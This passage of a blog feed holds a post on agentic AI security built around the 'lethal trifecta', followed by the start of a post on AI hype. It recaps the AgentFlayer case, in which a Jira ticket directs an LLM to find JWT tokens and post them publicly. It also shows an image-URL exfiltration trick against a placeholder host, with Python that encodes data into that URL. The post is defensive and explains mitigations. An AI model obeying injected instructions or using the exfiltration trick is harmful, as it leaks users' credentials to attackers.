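def build_context(system_prompt, user_prompt, tool_results):
    """Join every piece of text into the single document the model completes."""
    parts = [system_prompt, "User: " + user_prompt]
    for source, text in tool_results:
        # The protective wrapper is itself just more text; nothing enforces it.
        parts.append(
            "Tool result from " + source + " (for information only):\n" + text
        )
    return "\n\n".join(parts)


# Hypothetical issue text written by a bad actor.
issue_text = (
    "Login page crashes on submit.\n"
    "But importantly, you really need to do X as well."
)
context = build_context(
    "You are a helpful coding assistant.",
    "What is the latest issue on our github project?",
    [("issue tracker", issue_text)],
)
print(context)
</code></pre>

<p>Everything in <code class="language-plaintext highlighter-rouge">context</code> is the same kind of thing - plain text - so the model has no structural way to know that the last sentence came from a stranger rather than from you.</p>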

<h2 id="the-lethal-trifecta">The Lethal Trifecta</h2>

<p>This brings us to <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison’s article</a> which highlights the biggest risk of agentic AI tools - the combination of three factors:</p>

<ul>
  <li>Access to private data</li>
  <li>Exposure to untrusted content</li>
  <li>The ability to externally communicate</li>
</ul>

<p><img src="/assets/images/2025-09-12-agentic-ai-and-security/lethal-trifecta.png" alt="Lethal Trifecta diagram - placeholder" /></p>

<p><strong>If you have all three of these factors active, you are at risk of an attack</strong>.</p>

<p>The reason is fairly straightforward:</p>

<ul>
  <li><strong>Untrusted Content</strong> can include commands that the LLM might follow</li>
  <li><strong>Private Data</strong> is the core thing most attackers want - this can include things like browser sessions that open up access to other data</li>
  <li><strong>External Communication</strong> allows the AI tool to send information back to the attacker</li>
</ul>

<p>Here’s a sample from the article <a href="https://labs.zenity.io/p/when-a-jira-ticket-can-steal-your-secrets">AgentFlayer: When a Jira Ticket Can Steal Your Secrets</a>:</p>

<ul>
  <li>A user is using an LLM to browse Jira tickets (via an MCP server)</li>
  <li>Jira is set up to automatically get populated with Zendesk tickets from the public - <strong>Untrusted Content</strong></li>
  <li>An attacker creates a ticket carefully crafted to ask for “long strings starting with eyj” which is the signature of JWT tokens - <strong>Private Data</strong></li>
  <li>The ticket asks the LLM to log the identified data as a comment on the Jira ticket - which is then viewable to the public - <strong>External Communication</strong></li>
</ul>

<p>What seemed like a simple query becomes a vector for an attack.</p>
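
<p>One way to reason about this is to tag each tool in a session with the factors it brings, and check whether the session as a whole covers all three. This is a rough sketch under my own assumptions - the <code class="language-plaintext highlighter-rouge">Tool</code> class, its flags and the tool names are hypothetical, not part of any real product:</p>

<pre><code class="language-python">from dataclasses import dataclass


@dataclass(frozen=True)
class Tool:
    """Hypothetical description of one tool available to an agent session."""
    name: str
    reads_private_data: bool = False
    reads_untrusted_content: bool = False
    communicates_externally: bool = False


def has_lethal_trifecta(tools):
    """True when the combined tools cover all three risk factors."""
    return (
        any(t.reads_private_data for t in tools)
        and any(t.reads_untrusted_content for t in tools)
        and any(t.communicates_externally for t in tools)
    )


# Roughly the Jira scenario: public tickets come in, comments go out,
# and the agent can also read local files that may hold tokens.
session = [
    Tool("jira-mcp", reads_untrusted_content=True, communicates_externally=True),
    Tool("file-reader", reads_private_data=True),
]
print(has_lethal_trifecta(session))
</code></pre>

<p>Note that no single tool here has all three factors - it is the combination within one session that creates the risk.</p>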

<h2 id="mitigations">Mitigations</h2>

<p>So how do we lower our risk, without giving up on the power of AI tools? First, if you can eliminate one of these three factors, the risks are much lower.</p>

<h3 id="avoiding-access-to-private-data">Avoiding access to private data</h3>

<p>Totally avoiding this is almost impossible - our tools run on developer machines, they will have some access to things like our source code.</p>

<p>But we can <strong>reduce</strong> the threat by limiting the content that is available.</p>

<ul>
  <li><strong>Never store Production credentials in a file</strong> - LLMs can easily be convinced to read files</li>
  <li><strong>Avoid Dev credentials in files</strong> - you can use environment variables and <a href="https://developer.1password.com/docs/cli/secret-references">1Password command-line tooling</a> to ensure credentials are only in memory not in files.</li>
  <li><strong>Use temporary privilege escalation to access production data</strong></li>
  <li><strong>Limit access tokens to just enough privileges</strong> - read-only tokens are a much smaller risk than a token with write access</li>
  <li><strong>Avoid MCP servers that can read private data</strong> - you really don’t need something that can read your email (or see “Split the tasks” below).</li>
  <li><strong>Beware of browser automation</strong> - some tools like Playwright are OK as they run a browser in a sandbox, with no cookies or credentials. But some are <em>not</em> - there are tools out there to attach an MCP server to a running browser with access to all your cookies, sessions, and history. <em>This is not a good idea</em>.</li>
</ul>
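
<p>As a small illustration of the “environment variables, not files” point, a script can take its credential from the process environment and fail loudly if it isn’t there. This is only a sketch - <code class="language-plaintext highlighter-rouge">DEV_API_TOKEN</code> and <code class="language-plaintext highlighter-rouge">get_dev_token</code> are names I’ve invented for the example:</p>

<pre><code class="language-python">import os


def get_dev_token(name="DEV_API_TOKEN"):
    """Read a credential from the process environment rather than a file on disk."""
    token = os.environ.get(name)
    if not token:
        # Fail loudly instead of falling back to a credentials file.
        raise RuntimeError(name + " is not set; export it in your shell session")
    return token
</code></pre>

<p>This reduces the risk rather than removing it - an agent that can run shell commands in the same session may still be able to see the environment, so limited-privilege tokens still matter.</p>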

<h3 id="blocking-the-ability-to-externally-communicate">Blocking the ability to externally communicate</h3>

<p>This sounds easy, right? Just restrict those agents that can send emails or chat.
But this has a few problems:</p>

<ul>
  <li>Lots of MCP tools have ways to do things that can end up in the public eye. “Reply to a comment on an issue” seems safe until we realise that issue conversations might be public. Similarly “raise an issue on a public GitHub repo” or “create a Google Drive document (and then make it public)”.</li>
  <li>Web access is a big one. If you can control a browser, you can post information to a public site. But it gets worse - if you <em>open an image</em> with a carefully crafted URL, you might send data to an attacker. <code class="language-plaintext highlighter-rouge">GET https://foobar.net/foo.png?var=[data]</code> looks like an image request but that data can be logged by the foobar.net server.</li>
</ul>
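
<p>The image trick is easy to demonstrate with Python’s standard library. The sketch below builds the kind of URL described above and then shows what the receiving server could read back out of its access log - the function names are mine, and <code class="language-plaintext highlighter-rouge">foobar.net</code> is just the placeholder host from the example:</p>

<pre><code class="language-python">from urllib.parse import parse_qs, urlencode, urlsplit


def build_image_url(data):
    """Hide arbitrary data in the query string of an innocent-looking image URL."""
    return "https://foobar.net/foo.png?" + urlencode({"var": data})


def recover_from_request(url):
    """What the receiving server can read back from the logged request."""
    return parse_qs(urlsplit(url).query)["var"][0]


url = build_image_url("secret token 123")
print(url)
print(recover_from_request(url))
</code></pre>

<p>Nothing about the request looks unusual to the tool fetching it, which is part of why this class of attack is so hard to block.</p>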

<p>There are so many of these attacks that <a href="https://simonwillison.net/tags/exfiltration-attacks/">Simon Willison has an entire category of his site dedicated to exfiltration attacks</a>.</p>

<p>Vendors like Anthropic are working hard to lock these down, but it’s pretty much whack-a-mole.</p>

<h3 id="limiting-access-to-untrusted-content">Limiting access to untrusted content</h3>

<p class="notice--info">This is probably the best category for limiting our risk.</p>

<p><strong>You should avoid reading content that can be written by the general public</strong> - don’t read public issue trackers, don’t read arbitrary web pages, don’t let an LLM read your email or public chats!</p>

<p>Obviously <em>some</em> content is unavoidable - you can ask an LLM to summarise a web page, and you are <em>probably</em> safe from that web page having hidden instructions in the text. Probably. But probably better to stick to “Please search on docs.microsoft.com” than “Please read the latest comments on reddit”. Or keep the task that reads Reddit separate from other tasks - see “Split the tasks” below.</p>

<h3 id="beware-tools-that-violate-all-three-of-these">Beware tools that violate all three of these!</h3>

<p>It feels worth highlighting the worst kind of tools - MCP servers (or CLI tools) that access untrusted content <em>and</em> externally communicate <em>and</em> access private data.</p>

<p class="notice--danger">Some popular tools are a massive risk and should be avoided or only run in isolated containers.</p>

<p>A clear example of this is AI powered browsers, or browser extensions - anywhere you can use a browser <em>that can use your credentials or sessions or cookies</em> you are wide open:</p>

<ol>
  <li>Private data is exposed by any credentials you provide</li>
  <li>External communication is unavoidable - a GET to an image can expose your data</li>
  <li>Untrusted content is also pretty much unavoidable</li>
</ol>

<p>Simon Willison (again!) <a href="https://simonwillison.net/2025/Aug/25/agentic-browser-security/">has good coverage of this issue</a> after a report on the Comet “AI Browser”.</p>

<p>You should only use these tools if you can run them in a completely unauthenticated way - Microsoft’s <a href="https://github.com/microsoft/playwright-mcp">Playwright MCP server</a> is a good counter-example as it runs in an isolated browser instance. But don’t use their browser extension!</p>

<blockquote>
  <p>I strongly expect that the <em>entire concept</em> of an agentic browser extension is fatally flawed and cannot be built safely. - Simon Willison</p>
</blockquote>

<h3 id="split-the-tasks">Split the tasks</h3>

<p>A key point of the Lethal Trifecta is that it’s worst when all three factors exist.
So you can mitigate risks by splitting up the work into stages where each stage is safer.</p>

<p>For instance, you might want to research how to fix a Kafka problem - and yes, you might need to access Reddit. So run this as a multi-stage research project:</p>

<ol>
  <li>Identify the problem - ask the LLM to examine the codebase, examine official docs, identify the possible issues. Get it to craft a <code class="language-plaintext highlighter-rouge">research-plan.md</code> document describing what information it needs.
    <ul>
      <li>Read the <code class="language-plaintext highlighter-rouge">research-plan.md</code> to check it makes sense!</li>
    </ul>
  </li>
  <li>In a new session, run the research plan - this can be run without the same tool access, it could even be a standalone agent with access to only web searches. Get it to generate <code class="language-plaintext highlighter-rouge">research-results.md</code>.
    <ul>
      <li>Read the <code class="language-plaintext highlighter-rouge">research-results.md</code> to make sure it makes sense!</li>
    </ul>
  </li>
  <li>Now back in the codebase, ask the LLM to use the research results to work on a fix.</li>
</ol>
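
<p>The stages above can be sketched as data, which makes it easy to check that no single stage combines all three risk factors. This is just an illustration - the stage names and the way I’ve assigned risks to each stage are my own assumptions about a typical setup, not a real tool’s configuration:</p>

<pre><code class="language-python"># Hypothetical labels for the three factors of the Lethal Trifecta.
PRIVATE = "private data"
UNTRUSTED = "untrusted content"
EXTERNAL = "external communication"

# Each stage runs in its own session and hands over only a reviewed file.
STAGES = [
    {"name": "identify", "output": "research-plan.md", "risks": {PRIVATE}},
    {"name": "research", "output": "research-results.md", "risks": {UNTRUSTED, EXTERNAL}},
    {"name": "fix", "output": None, "risks": {PRIVATE}},
]


def unsafe_stages(stages):
    """Names of stages that combine all three risk factors."""
    trifecta = {PRIVATE, UNTRUSTED, EXTERNAL}
    return [s["name"] for s in stages if s["risks"] == trifecta]


print(unsafe_stages(STAGES))
</code></pre>

<p>The only things crossing between stages are the two markdown files, and those are exactly the points where a human reads the content before it goes any further.</p>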

<p>This is not only more secure, it is also increasingly a way people are encouraged to work. It’s too big a topic to cover here, but it’s a good idea to split LLM work into small stages, as the LLM works much better when its context isn’t too big. Dividing your tasks into “Think, Plan, Act” keeps context down, especially if “Act” can be chunked into a number of small independent and testable chunks.</p>

<p>Also this follows another key recommendation: “<strong>Keep a human in the loop</strong>”</p>

<h3 id="keep-a-human-in-the-loop">Keep a human in the loop</h3>

<p>AIs make mistakes, they hallucinate, they can easily produce slop and technical debt. And as we’ve seen, they can be used for attacks.</p>

<p>It is <em>ALWAYS</em> a good idea to check what they are doing. Either run them interactively, and watch them and approve as they work - or if running in the background, monitor their output carefully and make sure you are there to prune, to remove junk, to course-correct. If you are writing code, best practice is to have all code reviewed before it hits production - and those reviewers need to be human eyes.</p>

<p>Having a human in the loop allows us to catch problems earlier and to produce better results, as well as helping us be more secure.</p>

<h2 id="other-risks">Other risks</h2>

<h3 id="hosted-mcp-servers">Hosted MCP servers</h3>

<p>MCP servers that you don’t run yourself are increasingly common - <a href="https://context7.com/">Context7</a> is a good example - it gives you API lookup information, based on their giant database of scraped documentation. This seems fine, but you probably don’t have a commercial relationship with Context7. You don’t really control what they store, what they log, or what they do with what you send them. Context7 itself actually is OK - you can use the <code class="language-plaintext highlighter-rouge">/mcp</code> command in Claude to inspect its API, and it doesn’t ask for any data beyond library names.</p>

<p>But some are not so safe - something like <a href="https://www.graphlit.com/">Graphlit</a> for instance is designed to slurp a whole pile of your data and store it in a database hosted on their servers, with no commercial agreement and (given these are LLMs) no real guarantee that your LLM won’t decide to send them all sorts of confidential information.</p>

<h2 id="conclusions">Conclusions</h2>

<p>This is an area of rapid change - tools are improving, and there are continuous attempts to lock them down more securely. But as Bruce Schneier noted in <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html">the article I quoted at the start</a>, this is currently not going so well. And it’s probably going to get worse, as more people use the tools and attackers develop more sophisticated attacks. Most of the articles so far are about “proof of concept” demos, but it’s only a matter of time before some high-profile businesses get caught by AI tooling hacks.</p>

<p>So we need to keep aware of the changing state of things - keep reading sites like <a href="https://simonwillison.net/">Simon Willison’s weblog</a> and skeptical sites like <a href="https://pivot-to-ai.com/">Pivot to AI</a>, read the <a href="https://snyk.io/blog/">Snyk blogs</a> which have a lot on AI risks, and specifically <a href="https://snyk.io/articles/mcp-security-whats-old-is-new-again/">MCP security</a> - these are great learning resources, and I also assume Snyk will be offering more and more security tools in this space.</p>

<hr />

<p>I’ve given up on Discus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115451903530308404">My post on Mastodon</a> or <a href="https://bsky.app/profile/did:plc:bdphvffyy3x2lf5foeogab6u/post/3m4ay3wsjls26">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="Security" /><category term="AI" /><category term="security" /><category term="LLM" /><category term="agents" /><category term="MCP" /><summary type="html"><![CDATA[An expanded version of this post has been published at https://martinfowler.com/articles/agentic-ai-security.html - with more mitigations and updated content - I’d suggest reading that article instead, I’m leaving this one up for posterity. Also I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people) This is an edited version of a post I wrote for the Liberis internal engineering blog - it is not particularly original, most of the ideas come directly from Simon Willison’s article “Lethal Trifecta for AI agents” - but I thought it was worth writing a summary for our engineers, and sharing it more widely. Bruce Schneier summarised the current Agentic AI situation in his blog: We simply don’t know how to defend against these attacks. We have zero agentic AI systems that are secure against these attacks. Any AI that is working in an adversarial environment—and by this I mean that it may encounter untrusted training data or input—is vulnerable to prompt injection. It’s an existential problem that, near as I can tell, most people developing these technologies are just pretending isn’t there. 
There are many risks in this area, and it is in a state of rapid change - we need to understand the risks, keep an eye on them, and work out how to mitigate them where we can. (I’m going to shamelessly plagiarise Simon Willison’s excellent “Lethal Trifecta for AI agents” article as it is an excellent overview of the risks.) What do we mean by Agentic AI The terminology is in flux so terms are hard to pin down. I’m using “Agentic AI” with the specific meaning “LLM-based tools that can act autonomously” - tools that extend the basic LLM model with tools and agents and background processes. Increasingly this means “almost all AI based tools” - especially coding tools like Cursor, Copilot or Claude Code. (Note I’m using ‘agent’ here for any kind of tooling - some places reserve ‘agent’ for specific kinds of autonomous background agents, but that’s beyond this article) It helps to clarify the architecture and how these tools work: Basic architecture A simple non-agentic LLM just processes text - very very cleverly, but it’s still text-in and text-out: flowchart TD prompt@{shape: doc, label: "User Prompt"} output@{shape: doc, label: "Text Output"} subgraph llm["LLM"] context[System Context] training[Training Data] end prompt --&gt; llm llm --&gt; output Classic ChatGPT worked like this, but more and more tools are extending this with agents Agentic architecture An agentic LLM does more. 
It reads from a lot more sources of data, and it can trigger activities with side effects: flowchart TD prompt@{shape: doc, label: "User Prompt"} response@{shape: doc, label: "Text Response"} subgraph llm["Agentic LLM"] context[System Context] training[Training Data] sessioncontext@{shape: doc, label: "Session Context"} end read@{shape: lean-r, label: "Read Actions&lt;br/&gt;• Browse Web&lt;br/&gt;• Read Code&lt;br/&gt;• MCP Servers&lt;br/&gt;"} write@{shape: subroutine, label: "Write Actions&lt;br/&gt;• Modify files&lt;br/&gt;• HTTP calls&lt;br/&gt;• Shell commands&lt;br/&gt;• MCP Servers&lt;br/&gt;"} external@{ shape: docs, label: "External"} prompt --&gt; llm llm -.-&gt;|query| read read -.-&gt;|response added to context| llm llm -.-&gt;|execute| write write -.-&gt;|response added to context| llm llm --&gt; response write -.-&gt;|write| external Some of these agents are triggered explicitly by the user - but many are built in. For example coding tools will read your project source code and configuration, usually without informing you. And as the tools get smarter they have more and more agents under the covers. What is an MCP server? An MCP server really can be anything. MCP is an open standardised protocol to make it easier for an AI tool to call a service. That service might just be a local script that reads files, it might be a public cloud-based service that can read, write, perform actions, run background agents, pretty much do anything - it’s a very flexible protocol. MCP servers come with their own risks, as they don’t always come from large trusted vendors like Anthropic - the boom in AI coding means there is also a boom in people building tools, not always with the best quality control. On top of more general security issues discussed below, just calling an MCP server that has a flaw puts you at risk - all the usual rules about using 3rd party tools should apply. What are the risks? 
Commercially supported tools like Claude Code usually come with a lot of checks - for example Claude won’t read files outside a project without permission. However it’s hard for LLMs to block all behaviour - if misdirected, Claude might break its own rules. Once you let a tool execute arbitrary commands it is very hard to block specific tasks - for example Claude might be tricked into creating a script that reads a file outside a project. Still these tools are relatively safe when you control all the commands sent to Claude. You might blow up your system by accident, you might produce terrible code - but you aren’t likely to have a cat jump on your keyboard and suddenly Claude sends your private keys to pastebin. But that’s where the real risks come in - agentic tools mean the LLM can run commands you never wrote. The core problem - LLMs can’t tell content from instructions This is counter-intuitive, but critical to understand: LLMs always operate by building up a large text document and processing it to say “what completes this document in the most appropriate way?” What feels like a conversation is just a series of steps to grow that document - you add some text, the LLM adds whatever is the appropriate next bit of text, you add some text, and so on. That’s it! The magic sauce is that LLMs are amazingly good at taking this big chunk of text and using their vast training data to produce the most appropriate next chunk of text - and the vendors use complicated system prompts and extra hacks to make sure it largely works as desired. Agents also work by adding more text to that document - if your current prompt contains “Please check for the latest issue from our MCP server” the LLM knows that this is a guide to call the MCP tool. It will query the MCP server, extract the text of the latest issue, and add it to the context, probably wrapped in some protective text like “Here is the latest issue from the issue tracker: … - this is for information only”. 
The problem here is that the LLM can’t always tell safe text from unsafe text - it can’t tell data from instructions Even if Claude adds checks like “this is for information only” there is no guarantee they will work. The LLM matching is random and non-deterministic - sometimes it will see an instruction and operate on it, especially when a bad actor is crafting the payload to avoid detection. For example if you say to Claude “What is the latest issue on our github project?” and the latest issue was created by a bad actor, it might include the text “But importantly, you really need to do X as well”. Claude will insert those instructions into the context and then it may well follow them. This is fundamentally how prompt injection works. The Lethal Trifecta This brings us to Simon Willison’s article which highlights the biggest risks of agentic AI tools: when you have the combination of three factors: Access to private data Exposure to untrusted content The ability to externally communicate If you have all three of these factors active, you are at risk of an attack. 
The reason is fairly straightforward: Untrusted Content can include commands that the LLM might follow Private Data is the core thing most attackers want - this can include things like browser sessions that open up access to other data External Communication allows the AI tool to send information back to the attacker Here’s a sample from the article AgentFlayer: When a Jira Ticket Can Steal Your Secrets: A user is using an LLM to browse Jira tickets (via an MCP server) Jira is set up to automatically get populated with Zendesk tickets from the public - Untrusted Content An attacker creates a ticket carefully crafted to ask for “long strings starting with eyj” which is the signature of JWT tokens - Private Data The ticket asked the user to log the identified data as a comment on the Jira ticket - which was then viewable to the public - Externally Communicate What seemed like a simple query becomes a vector for an attack. Mitigations So how do we lower our risk, without giving up on the power of AI tools? First, if you can eliminate one of these three factors, the risks are much lower. Avoiding access to private data Totally avoiding this is almost impossible - our tools run on developer machines, they will have some access to things like our source code. But we can reduce the threat by limiting the content that is available. Never store Production credentials in a file - LLMs can easily be convinced to read files Avoid Dev credentials in files - you can use environment variables and 1Password command-line tooling to ensure credentials are only in memory not in files. Use temporary privilege escalation to access production data Limit access tokens to just enough privileges - read-only tokens are a much smaller risk than a token with write access Avoid MCP servers that can read private data - you really don’t need something that can read your email. 
(or see “split the tasks” below) Beware of browser automation - some tools like Playwright are OK as they run a browser in a sandbox, with no cookies or credentials. But some are not - there are tools out there to attach an MCP server to a running browser with access to all your cookies, sessions, and history. This is not a good idea. Blocking the ability to externally communicate This sounds easy, right? Just restrict those agents that can send emails or chat. But this has a few problems: Lots of MCP tools have ways to do things that can end up in the public eye. “Reply to a comment on an issue” seems safe until we realise that issue conversations might be public. Similarly “raise an issue on a public github repo” or “create a Google Drive document (and then make it public)” Web access is a big one. If you can control a browser, you can post information to a public site. But it gets worse - if you open an image with a carefully crafted URL, you might send data to an attacker. GET https://foobar.net/foo.png?var=[data] looks like an image request but that data can be logged by the foobar.net server. There are so many of these attacks, Simon Willison has an entire category of his site dedicated to exfiltration attacks Vendors like Anthropic are working hard to lock these down, but it’s pretty much whack-a-mole. Limiting access to untrusted content This is probably the best category for limiting our risk. You should avoid reading content that can be written by the general public - don’t read public issue trackers, don’t read arbitrary web pages, don’t let an LLM read your email or public chats! Obviously some content is unavoidable - you can ask an LLM to summarise a web page, and you are probably safe from that web page having hidden instructions in the text. Probably. But probably better to stick to “Please search on docs.microsoft.com” than “Please read the latest comments on reddit”. 
Or keep the task that reads Reddit separate from other tasks - see “Split the tasks” below. Beware tools that violate all three of these! It feels worth highlighting the worst kind of tools - MCP servers (or CLI tools) that both access untrusted content and externally communicate and access private data. Some popular tools are a massive risk and should be avoided or only run in isolated containers A clear example of this is AI powered browsers, or browser extensions - anywhere you can use a browser that can use your credentials or sessions or cookies you are wide open: Private data is exposed by any credentials you provide External communication is unavoidable - a GET to an image can expose your data Untrusted content is also pretty much unavoidable Simon Willison (again!) has a good coverage of this issue after a report on the Comet “AI Browser”. You should only use these tools if you can run them in a completely unauthenticated way - Microsoft’s Playwright MCP server is a good counter-example as it runs in an isolated browser instance. But don’t use their browser extension! I strongly expect that the entire concept of an agentic browser extension is fatally flawed and cannot be built safely. - Simon Willison Split the tasks A key point of the Lethal Trifecta is that it’s worst when all three factors exist. So you can mitigate risks by - splitting up the work into stages where each stage is safer. For instance, you might want to research how to fix a kafka problem - and yes, you might need to access reddit. So run this as a multi-stage research project: Identify the problem - ask the LLM to examine the codebase, examine official docs, identify the possible issues. Get it to craft a research-plan.md document describing what information it needs. Read the research-plan.md to check it makes sense! In a new session, run the research plan - this can be run without the same tool access, it could even be a standalone agent with access to only web searches. 
Get it to generate research-results.md Read the research-results.md to make sure it makes sense! Now back in the codebase, ask the LLM to use the research results to work on a fix. This is not only more secure, it is also increasingly a way people are encouraged to work. It’s too big a topic to cover here, but it’s a good idea to split LLM work into small stages, as the LLM works much better when its context isn’t too big. Dividing your tasks into “Think, Plan, Act” keeps context down, especially if “Act” can be chunked into a number of small independent and testable chunks. Also this follows another key recommendation: “Keep a human in the loop” Keep a human in the loop AIs make mistakes, they hallucinate, they can easily produce slop and technical debt. And as we’ve seen, they can be used for attacks. It is ALWAYS a good idea to check what they are doing. Either run them interactively, and watch them and approve as they work - or if running in the background, monitor their output carefully and make sure you are there to prune, to remove junk, to course-correct. If you are writing code, best practice is to have all code reviewed before it hits production - and those reviewers need to be human eyes. Having a human in the loop allows us to catch problems earlier, and to produce better results, as well as helping be more secure. Other risks Hosted MCP servers MCP servers that you don’t run yourself are increasingly common - Context7 is a good example - it gives you API lookup information, based on their giant database of scraped documentation. This seems fine but - you probably don’t have a commercial relationship with Context7. You don’t really control what they store, what they log, what they do with what we send them. Context7 itself actually is OK - you can use the /mcp command in Claude to inspect its API, and it doesn’t ask for any data beyond library names. 
But some are not so safe - something like GraphiLit for instance is designed to slurp a whole pile of your data and store it in a database hosted on their servers, with no commercial agreement and (given these are LLMs) no real guarantee that your LLM won’t decide to send them all sorts of confidential information. Conclusions This is an area of rapid change - tools are improving, and there are continuous attempts to lock them down more securely. But as Bruce Schneier noted in the article I quoted at the start, this is currently not going so well. And it’s probably going to get worse - as more people use the tools, and more attackers develop more sophisticated attacks - most of the articles are about “proof of concept” demos, but it’s only a matter of time before we get some actual high-profile businesses caught by AI tooling hacks. So we need to keep aware of the changing state of things - keep reading sites like Simon Willison’s weblog and skeptical sites like Pivot to AI, read the Snyk blogs which have a lot on AI risks, and specifically MCP security - these are great learning resources, and I also assume Snyk will be offering more and more security tools in this space. I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people)]]></summary></entry><entry><title type="html">Clowns to the left of me …</title><link href="https://blog.korny.info/2025/07/19/clowns-to-the-left-of-me" rel="alternate" type="text/html" title="Clowns to the left of me …" /><published>2025-07-19T00:00:00+01:00</published><updated>2025-07-19T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/19/clowns-to-the-left-of-me</id><content type="html" xml:base="https://blog.korny.info/2025/07/19/clowns-to-the-left-of-me"><![CDATA[<p>I’ve had the song “Stuck in the Middle with You” in my head for a few weeks. (R.I.P. Michael Madsen!)</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/reservoir-dogs-scene.jpg" alt="Reservoir Dogs ear scene" /><sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup></p>

<p>But not because of Reservoir Dogs - but because of the public discussion about AI coding tools. (Yes, I know… feel free to walk away if you are sick of the whole thing).</p>

<p>I feel like there’s this strange culture war, or something like it, playing out - with wild statements on both extremes - and I’m stuck in the middle.</p>

<h3 id="hype-to-the-left-of-me">Hype to the left of me</h3>

<p>There is just <em>so much</em> AI Hype.</p>

<p>I’m talking here mainly about software development tools. There’s plenty more ludicrous hype when it comes to other AI areas, but I’m trying to limit this to software engineering.</p>

<p>And the hype, as well as the naïveté, is extreme. You get people vibe coding their entire business applications with no thoughts of security. You get people claiming 50x speed improvements, or indeed “we don’t need developers at all”. You get people posting “I’m not a programmer but I used Copilot to build my entire product and it’s awesome”, with multiple variations of this. Online discussion forums seem to be full of highly risky advice - “I just turn on <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code>” or “use this MCP server which gives write access to your git repo and reads user-supplied comments”<sup id="fnref:trifecta" role="doc-noteref"><a href="#fn:trifecta" class="footnote" rel="footnote">2</a></sup> or even worse.</p>

<p>Amusingly there’s also quite a few comments like “oops I deleted my whole file system, what do I do now?” or “I’m not a programmer and I got Copilot to build my product but now it’s broken and won’t change anything - I want my money back”. There’s some tasty schadenfreude here but I also feel a bit sorry for some of these people, where things started <em>so</em> nicely, but now technical debt, AI slop, and a lack of the knowledge of what “good” looks like, are making it all fall apart.</p>

<p>A lot of the hype is just marketing - astroturfing from fake users, or just plain press releases breathlessly reported by the media, or marketing via dubious research articles. “Look at our amazing new model, it has so much more data than the last one, it is reasoning now! We ran these benchmarks to prove it!”</p>

<p>A lot of the hype though does seem to be genuine users - lured by the quick result, the slick prototype, the dopamine hit of seeing all that code produced, without the boring course-corrections that feel like waste. Once you are high on the “look how much code I can make” drug, it’s hard not to evangelise it to everyone else.</p>

<p>And as the last year or two have shown us, it’s very easy for people to be fooled by LLMs, which excel at looking like something they are not. People anthropomorphise the tools all the time - “Why did Claude do this dumb thing? Can’t it see the example I’m looking at of how to do it?” - they start to think this is genuine intelligence that can reason and learn, not a specific set of tools.</p>

<p>LLMs are wonderful machines that read your data and questions and produce results in a way that <em>feels</em> like intelligence, but is actually just really clever pattern matching and a surrounding ecosystem of context sources and tools. Sometimes the results are amazing, occasionally they are terrible, and <em>you always need to check the results</em> because the process is fundamentally nondeterministic, and just because 99% of the time something worked, there’s always that 1% chance it was confidently wrong.</p>

<h3 id="skeptics-to-the-right">Skeptics to the right</h3>

<p>On the other side - the anti-AI sentiment is also pretty wild.</p>

<p>I think most of these folks are well meaning - far more so than the pro-AI hypers; my sympathy is with healthy skepticism in general. But they are also prone to jumping on hype - for one example the <a href="https://www.brainonllm.com/">Your Brain on ChatGPT</a> paper, which is still in pre-print, not peer reviewed, and has had <a href="https://theconversation.com/mit-researchers-say-using-chatgpt-can-rot-your-brain-the-truth-is-a-little-more-complicated-259450">some</a> <a href="https://www.changetechnically.fyi/2396236/episodes/17378968-you-deserve-better-brain-research">serious</a> <a href="https://www.globaleconomicnews.au/opinions/your-brain-on-chatgpt-a-forensic-takedown">criticism</a>, still got a <em>huge</em> amount of coverage, including <a href="https://time.com/7295195/ai-chatgpt-google-learning-school/">Time Magazine</a> - this includes some classic moral panic language:</p>

<blockquote>
  <p>Her team did submit it for peer review but did not want to wait for approval, which can take eight or more months, to raise attention to an issue that Kosmyna believes is affecting children now.</p>
</blockquote>

<p>Oh my goodness, will nobody protect our children?!</p>

<p>Similarly the <a href="https://metr.org/blog/2025-07-10-early-2025-ai-experienced-os-dev-study/">recent study on experienced open-source developer productivity</a> is being waved around to say “this proves they don’t work” - I think this has been shared multiple times on every single tech forum I frequent. The authors of the paper evidently expected this, and provided this table, which doesn’t seem to get as much mention as their headlines:</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/metr-study-table.png" alt="METR study results table" /></p>

<p>And this interesting breakdown of likely contributing factors:</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/metr-contributing-factors.png" alt="METR study contributing factors" /></p>

<p>This study is actually pretty interesting - it does show that we should be cautious about trusting self-assessment of how good these tools are, and it probably shows real limitations in large complex codebases. But it’s no “Ah-ha! The emperor has no clothes!” moment, as far as I can tell. (After I wrote this, I found that <a href="https://simonwillison.net/2025/Jul/12/ai-open-source-productivity/">Simon Willison has a good discussion of this paper as well</a> - and there’s a rather more severe critique at <a href="https://www.fightforthehuman.com/are-developers-slowed-down-by-ai-evaluating-an-rct-and-what-it-tells-us-about-developer-productivity/">Cat Hicks’s blog</a>.)</p>

<p>I also see quite a few people who have tried the most basic, un-assisted, low-context tools, and get terrible results; and then rule out AI tools as fundamentally broken. “I used copilot and its suggestions are wrong 40% of the time, often ludicrously wrong”. This was where I was at 6 months ago - Copilot seemed like a handy yet often irritating Clippy, no big deal. I think this drives a lot of skepticism, people who feel they gave it a go, it didn’t live up to the hype, so they’ve made up their minds.</p>

<p>And generally there’s just a lot of anger and frustration, in reaction to the constant flood of hype:</p>

<p><img src="/assets/images/2025-07-19-clowns-to-the-left-of-me/neologism-rant.png" alt="ranty example" /></p>

<p>As I said before, I’m more sympathetic to the skeptics than the hypers. Especially when it comes to the broader AI industry - I’m always keen to read <a href="https://pivot-to-ai.com/">David Gerard’s Pivot to AI</a> or any of <a href="https://www.wheresyoured.at/">Ed Zitron’s rants</a> - see also <a href="#dont-forget-the-downsides">my downsides section later</a>.</p>

